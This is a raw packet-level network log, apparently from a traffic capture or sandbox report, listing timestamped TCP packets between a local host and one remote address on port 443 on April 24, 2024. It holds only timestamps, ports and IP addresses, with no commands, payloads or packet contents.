Apr 24, 2024 16:48:25.619769096 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.619781017 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.619791031 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.619826078 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.619837046 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.619854927 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.619900942 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.619931936 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.619992018 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.620042086 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.620054960 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.620073080 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.620124102 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.620131016 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.620157957 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.620227098 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.620227098 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.620227098 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.620239019 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.620313883 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.620328903 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.620373964 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.620383024 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.621417999 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.621623993 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.621642113 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.621687889 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.621696949 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.623548985 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.652158022 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.652179003 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.652313948 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.652327061 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.652523041 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.688133001 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.688152075 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.688303947 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.688349009 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.690949917 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.720398903 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.720457077 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.720489025 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.720505953 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.720534086 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.720554113 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.753463030 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.753504038 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.753703117 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.753722906 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.753880024 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.778430939 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.778449059 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.778613091 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.778623104 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.778717041 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.808692932 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.808760881 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.808819056 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.808834076 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:25.808851004 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:25.808912039 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.156395912 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.156454086 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.156483889 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.156500101 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.156528950 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.156550884 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.156599998 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.156640053 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.156662941 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.156667948 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.156708002 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.156774044 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.156812906 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.156835079 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.156845093 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.156862020 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.156892061 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.156932116 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.156971931 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.157001972 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.157006025 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.157047033 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.157104969 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.157145023 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.157171011 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.157175064 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.157201052 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.157222033 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.157269001 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.157308102 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.157329082 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.157334089 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.157368898 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.157402039 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.157433987 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.157471895 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.157499075 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.157502890 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.157546043 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.157578945 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.157618999 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.157641888 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.157645941 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:26.157675982 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:26.157694101 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:30.801665068 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:30.801702976 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:30.801747084 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:30.801750898 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:30.801780939 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:30.801781893 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:30.801801920 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:30.801816940 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:30.801856995 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.129379988 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129400015 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129421949 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129487991 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.129513025 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129547119 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.129553080 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129580975 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129605055 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.129611969 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129647017 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129666090 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.129673958 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129689932 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129698038 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.129744053 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.129750013 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129761934 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129779100 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129801989 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.129807949 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129831076 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.129836082 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129857063 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129858971 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.129869938 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129895926 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.129926920 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129945993 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129946947 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.129956007 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.129978895 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.130008936 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.130016088 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.130022049 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.130057096 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.130074024 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.130101919 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.130106926 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.130122900 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.130135059 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.130192041 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.462857962 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.462924004 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.462956905 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.462971926 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.462985992 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.462997913 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.796906948 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.796952963 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.796997070 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.797024012 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.797044039 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:31.797068119 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:31.797081947 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:32.114278078 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:32.114295006 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:32.114316940 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:32.114371061 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:32.114387989 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:32.114415884 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:32.114438057 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:32.142575979 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:32.142601013 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:32.142654896 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:32.142664909 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:32.142698050 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:32.142716885 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.041572094 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.041609049 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.041657925 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.041830063 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.041830063 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.041847944 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.041894913 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.710958958 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.710999012 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.711050034 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.711167097 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.711167097 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.711167097 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.711180925 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.711190939 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.711218119 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.711232901 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.739784002 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.739840984 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.739991903 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.739991903 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.740000010 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.740036011 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.766823053 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.766869068 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.767013073 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.767013073 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.767020941 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.767061949 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.791634083 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.791680098 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.791723967 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.791729927 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.791882038 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.818401098 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.818447113 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.818483114 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.818489075 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.818531036 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.845518112 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.845577955 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.845611095 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.845618010 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.845660925 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.872320890 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.872380972 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.872437000 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.872443914 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.872607946 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.872608900 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.899511099 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.899558067 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.899614096 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.899621964 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.899770975 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.926215887 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.926264048 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.926323891 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.926376104 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.926409006 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.926429033 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.966737032 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.966799021 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.966834068 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.966861963 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.966880083 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.966907978 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.977909088 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.977952957 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.978004932 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.978012085 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:41.978044987 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:41.978060007 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.002742052 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.002784967 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.002824068 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.002831936 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.002861023 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.002885103 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.039345026 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.039388895 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.039431095 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.039465904 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.039508104 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.041946888 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.048424959 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.048465967 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.048511982 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.048521996 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.048561096 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.048582077 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.075330973 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.075376987 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.075433969 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.075479984 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.075516939 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.075540066 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.104252100 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.104293108 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.104370117 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.104412079 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.104444981 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.104473114 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.129121065 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.129163027 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.129211903 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.129230976 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.129264116 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.129342079 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.158054113 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.158097982 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.158260107 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.158261061 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.158330917 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.158396006 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.183120966 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.183161974 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.183219910 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.183291912 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.183334112 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.183358908 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.209804058 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.209846020 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.209893942 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.209942102 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.209978104 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.210000992 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.234735966 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.234776974 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.234838963 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.234853983 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.234889984 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.234913111 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.263698101 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.263741016 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.263880968 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.263957977 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.264003038 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.264028072 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.290688992 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.290735960 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.290843964 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.290890932 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.290955067 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.315455914 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.315498114 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.315556049 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.315573931 CEST	443	49743	95.217.246.168	192.168.2.4
Apr 24, 2024 16:48:42.315607071 CEST	49743	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:48:42.315632105 CEST	49743	443	192.168.2.4	95.217.246.168
